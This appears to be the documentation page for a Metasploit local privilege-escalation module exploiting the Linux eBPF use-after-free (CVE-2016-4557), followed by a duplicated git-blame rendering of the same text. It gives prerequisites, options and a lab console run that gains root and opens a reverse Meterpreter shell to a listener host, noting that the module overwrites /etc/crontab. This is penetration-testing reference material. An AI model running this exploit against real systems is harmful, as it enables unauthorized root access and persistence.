documentation/modules/exploit/linux/local/bpf_priv_esc.md

## Notes

  Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)
  does not properly reference count file descriptors, resulting
  in a use-after-free, which can be abused to escalate privileges.

  The target system must be compiled with `CONFIG_BPF_SYSCALL`
  and must not have `kernel.unprivileged_bpf_disabled` set to 1.

  Note, this module will overwrite the first few lines
  of `/etc/crontab` with a new cron job. The job will
  need to be manually removed.


## Vulnerable Application

  This module has been tested successfully on:

  * Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel)

  This module was not tested against, but may work against:

  * Fedora 24 < [kernel-4.5.4-300.fc24](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
  * Fedora 23 < [kernel-4.5.5-201.fc23](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
  * Fedora 22 < [kernel-4.4.10-200.fc22](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
  * Debian >= 4.4~rc4-1~exp1, < Fixed in version [4.5.3-1](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=82
  * Ubuntu 14.04.1 <= [4.4.0-22.39](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1578705/comments/3)


## Creating A Testing Environment

There are a few requirements for this module to work:

  1. `CONFIG_BPF_SYSCALL=y` must be set in the kernel (default on Ubuntu 16.04)
  2. `kernel.unprivileged_bpf_disabled` can't be set to `1` (default on Ubuntu 16.04)
  3. fuse needs to be installed (non-default on Ubuntu 16.04)
  
  Using Ubuntu 16.04, simply `sudo apt-get install fuse` and you're all set!

  The `libfuse-dev` package must be installed to test live-compiling on the target:

  `apt-get install libfuse-dev=2.9.4-1ubuntu3.1`


## Verification Steps

  1. Start msfconsole
  2. Exploit a box via whatever method
  3. Do: `use exploit/linux/local/bpf_priv_esc
  4. Do: `set session #`
  5. Do: `set verbose true`
  6. Do: `exploit`

## Options

  **MAXWAIT**

  The first stage of this priv esc can take ~35 seconds to execute.  This is the timer on how long we should wait till we give up on the first stage finishing.  Defaults to `120` (seconds)

  **WritableDir**

  A folder we can write files to.  Defaults to `/tmp`

  **COMPILE**
  
  If we should live compile on the system, or drop pre-created binaries.  Auto will determine if gcc/libs are installed to compile live on the system.  Defaults to `Auto`


## Scenarios

### Ubuntu 16.04 (with Linux 4.4.0-21-generic)

In this scenario, gcc and libfuse-dev are both installed so we can live compile on the system.

  ```
  msf5 > use exploit/linux/local/bpf_priv_esc 
  msf5 exploit(linux/local/bpf_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/bpf_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/bpf_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf5 exploit(linux/local/bpf_priv_esc) > run
  
  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [+] Kernel version 4.4.0-21-generic appears to be vulnerable
  [+] fuse package is installed
  [+] /tmp/fuse_mount doesn't exist
  [+] Kernel config has CONFIG_BPF_SYSCALL enabled
  [+] Unprivileged BPF loading is permitted
  [+] libfuse-dev is installed
  [+] gcc is installed
  [+] pkg-config is installed
  [*] Live compiling exploit on system...
  [*] Writing '/tmp/hello.c' (2682 bytes) ...
  [*] Writing '/tmp/doubleput.c' (5168 bytes) ...
  [*] Writing '/tmp/suidhelper.c' (333 bytes) ...
  [*] Uploading payload...
  [*] Writing '/tmp/.FVfiRBKRDX7r' (285 bytes) ...
  [*] Launching exploit. This may take up to 120 seconds.
  [+] Success! set-uid root /tmp/suidhelper
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (861348 bytes) to 172.16.191.141
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.141:34804) at 2018-12-15 00:20:04 -0500
  [+] Deleted /tmp/hello.c
  [+] Deleted /tmp/hello
  [+] Deleted /tmp/doubleput.c
  [+] Deleted /tmp/doubleput
  [+] Deleted /tmp/suidhelper.c
  [+] Deleted /tmp/.FVfiRBKRDX7r
  [+] Deleted /tmp/fuse_mount
  
  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.141
  OS           : Ubuntu 16.04 (Linux 4.4.0-21-generic)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```
cve-2016-4557 2016-09-29 05:23:12 -04:00			`## Notes`

Update documentation 2018-12-15 05:41:40 +00:00			`Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)`
			`does not properly reference count file descriptors, resulting`
			`in a use-after-free, which can be abused to escalate privileges.`
cve-2016-4557 2016-09-29 05:23:12 -04:00
Update documentation 2018-12-15 05:41:40 +00:00			The target system must be compiled with `CONFIG_BPF_SYSCALL`
			and must not have `kernel.unprivileged_bpf_disabled` set to 1.
additional doc updates 2016-09-29 19:02:16 -04:00
Notify operator that cleanup of crontab is required 2019-12-26 16:21:44 +00:00			`Note, this module will overwrite the first few lines`
			of `/etc/crontab` with a new cron job. The job will
			`need to be manually removed.`

additional doc updates 2016-09-29 19:02:16 -04:00
Update documentation 2018-12-15 05:41:40 +00:00			`## Vulnerable Application`

			`This module has been tested successfully on:`

Update tested versions 2018-12-15 05:44:32 +00:00			`* Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel)`
Update documentation 2018-12-15 05:41:40 +00:00
			`This module was not tested against, but may work against:`

			`* Fedora 24 < [kernel-4.5.4-300.fc24](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)`
			`* Fedora 23 < [kernel-4.5.5-201.fc23](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)`
			`* Fedora 22 < [kernel-4.4.10-200.fc22](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)`
			`* Debian >= 4.4~rc4-1~exp1, < Fixed in version [4.5.3-1](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=82`
			`* Ubuntu 14.04.1 <= [4.4.0-22.39](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1578705/comments/3)`

additional doc updates 2016-09-29 19:02:16 -04:00
cve-2016-4557 2016-09-29 05:23:12 -04:00			`## Creating A Testing Environment`

			`There are a few requirements for this module to work:`

Update documentation 2018-12-15 05:41:40 +00:00			1. `CONFIG_BPF_SYSCALL=y` must be set in the kernel (default on Ubuntu 16.04)
			2. `kernel.unprivileged_bpf_disabled` can't be set to `1` (default on Ubuntu 16.04)
			`3. fuse needs to be installed (non-default on Ubuntu 16.04)`
cve-2016-4557 2016-09-29 05:23:12 -04:00
			Using Ubuntu 16.04, simply `sudo apt-get install fuse` and you're all set!

Update documentation 2018-12-15 05:41:40 +00:00			The `libfuse-dev` package must be installed to test live-compiling on the target:
cve-2016-4557 2016-09-29 05:23:12 -04:00
Update documentation 2018-12-15 05:41:40 +00:00			`apt-get install libfuse-dev=2.9.4-1ubuntu3.1`
cve-2016-4557 2016-09-29 05:23:12 -04:00

			`## Verification Steps`

			`1. Start msfconsole`
			`2. Exploit a box via whatever method`
Update documentation 2018-12-15 05:41:40 +00:00			3. Do: `use exploit/linux/local/bpf_priv_esc
			4. Do: `set session #`
			5. Do: `set verbose true`
			6. Do: `exploit`
cve-2016-4557 2016-09-29 05:23:12 -04:00
			`## Options`

			`MAXWAIT`

Update documentation 2018-12-15 05:41:40 +00:00			The first stage of this priv esc can take ~35 seconds to execute. This is the timer on how long we should wait till we give up on the first stage finishing. Defaults to `120` (seconds)
cve-2016-4557 2016-09-29 05:23:12 -04:00
			`WritableDir`

Update documentation 2018-12-15 05:41:40 +00:00			A folder we can write files to. Defaults to `/tmp`
cve-2016-4557 2016-09-29 05:23:12 -04:00
			`COMPILE`

Update documentation 2018-12-15 05:41:40 +00:00			If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto`
cve-2016-4557 2016-09-29 05:23:12 -04:00

Update documentation 2018-12-15 05:41:40 +00:00			`## Scenarios`
cve-2016-4557 2016-09-29 05:23:12 -04:00
Update documentation 2018-12-15 05:41:40 +00:00			`### Ubuntu 16.04 (with Linux 4.4.0-21-generic)`
cve-2016-4557 2016-09-29 05:23:12 -04:00
			`In this scenario, gcc and libfuse-dev are both installed so we can live compile on the system.`

Update documentation 2018-12-15 05:41:40 +00:00			```
			`msf5 > use exploit/linux/local/bpf_priv_esc`
			`msf5 exploit(linux/local/bpf_priv_esc) > set session 1`
			`session => 1`
			`msf5 exploit(linux/local/bpf_priv_esc) > set verbose true`
			`verbose => true`
			`msf5 exploit(linux/local/bpf_priv_esc) > set lhost 172.16.191.188`
			`lhost => 172.16.191.188`
			`msf5 exploit(linux/local/bpf_priv_esc) > run`

			`[*] Started reverse TCP handler on 172.16.191.188:4444`
			`[+] Kernel version 4.4.0-21-generic appears to be vulnerable`
			`[+] fuse package is installed`
			`[+] /tmp/fuse_mount doesn't exist`
			`[+] Kernel config has CONFIG_BPF_SYSCALL enabled`
			`[+] Unprivileged BPF loading is permitted`
			`[+] libfuse-dev is installed`
			`[+] gcc is installed`
			`[+] pkg-config is installed`
			`[*] Live compiling exploit on system...`
			`[*] Writing '/tmp/hello.c' (2682 bytes) ...`
			`[*] Writing '/tmp/doubleput.c' (5168 bytes) ...`
			`[*] Writing '/tmp/suidhelper.c' (333 bytes) ...`
			`[*] Uploading payload...`
			`[*] Writing '/tmp/.FVfiRBKRDX7r' (285 bytes) ...`
			`[*] Launching exploit. This may take up to 120 seconds.`
			`[+] Success! set-uid root /tmp/suidhelper`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (861348 bytes) to 172.16.191.141`
			`[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.141:34804) at 2018-12-15 00:20:04 -0500`
			`[+] Deleted /tmp/hello.c`
			`[+] Deleted /tmp/hello`
			`[+] Deleted /tmp/doubleput.c`
			`[+] Deleted /tmp/doubleput`
			`[+] Deleted /tmp/suidhelper.c`
			`[+] Deleted /tmp/.FVfiRBKRDX7r`
			`[+] Deleted /tmp/fuse_mount`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 172.16.191.141`
			`OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter >`
			```